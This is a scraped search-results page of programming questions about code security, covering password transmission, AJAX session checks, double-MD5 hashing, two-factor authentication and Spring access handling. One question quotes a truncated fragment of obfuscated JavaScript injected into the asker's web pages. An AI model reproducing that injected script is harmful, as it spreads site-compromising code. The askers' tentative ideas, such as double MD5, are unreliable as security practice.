Search Results

Search found 97980 results on 3920 pages for 'code security'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 251/3920 | < Previous Page | 247 248 249 250 251 252 253 254 255 256 257 258  | Next Page >

  • Sending passwords over the web

    - by Falmarri
    So I'm working on a mobile platform application that I'd like to have users authenticate over the web. I was wondering the best way to do security. The user is sending a password for HTTP to a php server wich authenticates against a mysql database on the same server. Obviously I don't want to send the password in plain text over the internet, but I also don't want to do 2 SHA hashes. This is what the server looks like (in pseudocode) $pass = $_POST['pass']; if ((get PASSWORD where USERNAME = USERNAME) == SHA($pass)) return PASS; This is pretty standard and I don't think there's any other way to do this. But I was wondering how I should prepare the data before sending it over the internet.

    Read the article

  • Securing an ajax request

    - by asdasdsa
    i have a website that uses session cookies for security. it works fine and all, but any ajax requests right now are not secure. example being lets say a user is on a page. they can only get to this page if they are logged in with a session - so far so good. but now the ajax request they ask for is ajaxpages/somepage.php?somevar=something&anothervar=something if any other user decides to just go to that link themselves (without a session) they still get the same ajax output that was meant for logged in people. so obviously im going to have to pass session data across when i send an ajax request. anyone have any tips for the best way of doing this? ive never done this before and would rather use trusted methods than make up my own.

    Read the article

  • Location of code when sending HTML Email

    - by ChrisWesAllen
    I'm trying to figure out where to put some code in an email. You know how you can get newsletters with styling and images, etc? I wanted to send some out but I cant figure out where to put the code. Do you add the images as attachments? Do you put the code in the body? or should you upload the .html file as well?

    Read the article

  • MD5 password twice

    - by NoviceCoding
    I know MD5's safety is under question lately and this is the reason a lot of people are using salt (I dont understand this at all btw) but I was wondering if you wanted to easily implement a safe system in php can you just md5 something twice? like test 098f6bcd4621d373cade4e832627b4f6 fb469d7ef430b0baf0cab6c436e70375 So basically: $val = 'test'; $val = md5($val); $val = md5($val); Would that solve the whole rainbow security stuff? Is there an easy/noob proof way of making secure database passwords in php?

    Read the article

  • I'm trying to implement 2 factor authentication on the cheap. How would I do that?

    - by Biff MaGriff
    Ok so I need 2 of the 3. Something the user knows. Something the user has. Something the user is. I have a system that is exposed to the internet and we need clients to connect in a secure manner to satisfy our security standards. I'm thinking when a user registers to use our system we send them an application that they install on their home system. The application generates a key based on a timed randomness algorithm. Our application server has the same algorithm so when the user submits their credentials with the key we know that they are a legitimate user. Is this a valid method of 2 factor authentication? What is another way of doing this? Are there any pitfalls that I should be aware of? Thanks for your help!

    Read the article

  • Chunks of javascript added to webpages on server

    - by SteD
    I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.

    Read the article

  • Is there any algorithm for turning simple HAXE code into C/C++ code files?

    - by Ole Jak
    I have simple Haxe app like class Main { public static function main() { trace("hello world"); } } I know how to compile such app for windows (not as SWF but as app from pure C\C++ )(and you can see how here but be worned thay use hxcpp\0,4 ) The problem is - I do not want to compile app for Windows Vista or 7 or XP I want to get PURE C\C++ code (better in one place as one project) for for example compiling that code on windows mobile or where ever I want to. So is there any algorithm for turning simple HAXE code into C/C++ code files?

    Read the article

  • Manipulate data in the DB query or in the code

    - by DrDro
    How do you decide on which side you perform your data manipulation when you can either do it in the code or in the query ? When you need to display a date in a specific format for example. Do you retrieve the desired format directly in the sql query or you retrieve the date then format it through the code ? What helps you to decide : performance, best practice, preference in SQL vs the code language, complexity of the task... ?

    Read the article

  • Setting a ListView Divider in code

    - by deSelby
    One of my ListView's needs to be created in code. When I specify a ListView in xml, I can set a dividerHeight and assign a color to the divider. But apparently, in code a color is not acceptable nor is pointing to a resource id. Only a Drawable is acceptable - and I haven't gotten to that chapter yet. Can someone point me to an example of setting a ListView divider in code?

    Read the article

  • Generating code at compile-time using scripts

    - by Manux
    Hello, I would ideally like to be able to add (very repetitive) C/C++ code to my actual code, but at compile time, code which would come from say, the stdout of a python script, the same way one does with macros. For example, let's say I want to have functions that depend on the public attributes of a given class, being able to just write the following in my C++ code would be a blessing: generate_boring_functions(FooBarClass,"FooBarClass.cpp") Is that feasible using conventional means? Or must I hack with Makefiles and temporary source files? Thanks.

    Read the article

  • writing boot sector code

    - by JGC
    hi I want to write a code which put something in bootsector but when I run the assembly 8086 code which does this purpose, nothing happens. does any one know what can I do or does any one has code (in any language) which answer my need?

    Read the article

  • Can Spring access-denied-handler refer to popup?

    - by Rens Groenveld
    I am working with Spring Security 3.1.x and have implemented method annotation securities. As I want, when I perform a certain action while being logged in as a used that doesn't have the rights, I get a 403 acces is denied in my console! Perfect! Now I would like to catch this 403, and give the user a popup with a custom message. I don't want to redirect users to a page saying that they have no rights. Is there any way the access-denied-handler of Spring can take care of a popup? Or can it only redirect to another page? Maybe there are other options for me? Thanks in advance!

    Read the article

  • Are there any context-sensitive code search tools?

    - by Vicky
    I have been getting very frustrated recently in dealing with a massive bulk of legacy code which I am trying to get familiar with. Say I try to search for a particular function call, I get loads of results that turn out to be completely irrelevant; some of them are easy to spot, eg a comment saying // Fixed functionality in foo() so don't need to handle this here any more But others are much harder to spot manually, because they turn out to be calls from other functions in modules that are only compiled in certain cases, or are part of a much larger block of code that is #if 0'd out in its entirety. What I'd like would be a search tool that would allow me to search for a term and give me the choice to include or exclude commented out or #if 0'd out code. Then the search results would be displayed alongside a list of #defines that are required in order for that snippet of code to be relevant. I'm working in C / C++, but other than the specific comment syntax I guess the techniques should be more generally applicable. Does such a tool exist?

    Read the article

  • algorithmes with no executable example code

    - by gcc
    [link] http://stackoverflow.com/questions/2932016/parsing-of-mathematical-expressions (problem has been told before) ** program is to create the infix tree for the given math expression.** if the expression is given completely paranthesized then the out put is fine but when there are no paranthesis or some part paranthesized then the out put is wrong. cant get the idea how to solve. my problem is told above. I have some algorithm to solve my problem, but I have no simple code which will be guide for me. Can anyone give me simple code (not working code) so that I will try working to understand.(for a 3 hours ,I have been searching and reading some text to understand algorithm which is told above.Actually,there is no example code investigating how it is working. Can anyone send me example which is written in c not other language.

    Read the article

  • Sitemap Links don't work on live site, Windows Authentication

    - by Chris
    I have a intranet site with Windows Authentication. I have 'Administrator' pages in an 'Administrator' folder that will only show for those in the admin group (windows security group) These pages work I have a folder with sub folders containing reports. These permissions are broken down for each type of report. They have similar role priveleges. When I test the application, I can navigate to the pages. When I deploy the site live on the intranet the links don't return a page. Error missing link 404. Do I need to set something in IIS?

    Read the article

  • Sql server execute permission; failure to apply permissions

    - by WestDiscGolf
    I've just migrated from SQL2000 to SQL2008 and I have started getting an execute permission issue on a stored proc which uses sp_OACreate. The rest of the system works fine with the db login which has been setup and added to the database. I've tried: USE master GO GRANT EXEC ON sp_OACreate TO [dbuser] GO But this fails with the following error: Msg 15151, Level 16, State 1, Line 1 Cannot find the user 'dbuser', because it does not exist or you do not have permission. I'm logged into the server as sa with full permissions. I can execute a similar sql statement and apply the permissions to a server role, however not a login/user. How do I apply the changes to the specific user/login? I can apply the permissions to the public role and it resolves my issue; however this seems to be a security issue to me which I don't really want to apply to the live server.

    Read the article

  • Best way to Store Passwords, User information/Profile data and Photo/Video albums for a social websi

    - by Nick
    Need some help figuring out how to best Store Passwords, User information/Profile data and Photo/Video albums for a social website? For photos/videos the actual photo/video + even encrypting the URL with the IDs to the photo/videos so other users cannot figure it out. Creating a site like myspace and designing retirement documents but i am unsure how to specify the security requirements for the database. Two things: 1) Protect from outside users 2) Protect all these from employees being able to access this info For #2, the additional question is: If we encrypt the user info and password so even the system admins cannot get in, how can we retrieve the user data tomorrow if someone flags the user's account as spam and admin needs to check it out or if law enforcement wants info on a user? Thanks.

    Read the article

  • The risk of granting to IUSR* NTFS permissions on a folder on the server

    - by vtortola
    I have two web applications that must share a file in the server file system. Both apps are inside of "Inetpub\wwwroot". The file cannot be accessed freely from outside, so it is in a folder out of "Inetpub". I have granted full NTFS permissions to the user "IUSR_whatever" (is the user that runs IIS in anonymous requests) in that folder. The folder has only that file, and has no other use. It works so far :) But, what is the risk? what should I be afraid of? As I see it, as long the folder is out of the "InetPub" cannot be accessed, and as long the apps don't have any security flaw like "path traversal" or server side code injection, it should be safe enough.... But I'm always keen to be wrong :) What do you think? May the file or even the server itself get compromised because of this? Thanks.

    Read the article

  • Calling C# code from Java?

    - by Keith G
    Does anyone have a good solution for integrating some C# code into a java application? The code is small, so I could re-write in java, but I would rather reuse the code if possible. Don't repeat yourself, etc. Also, I know I can expose the C# as a web service or whatever, but it has some security/encryption stuff in there, so I would rather keep it tightly integrated if possible. Edit: It's going to be on a server-based app, so "downloading" another runtime is irrelevant.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 247 248 249 250 251 252 253 254 255 256 257 258  | Next Page >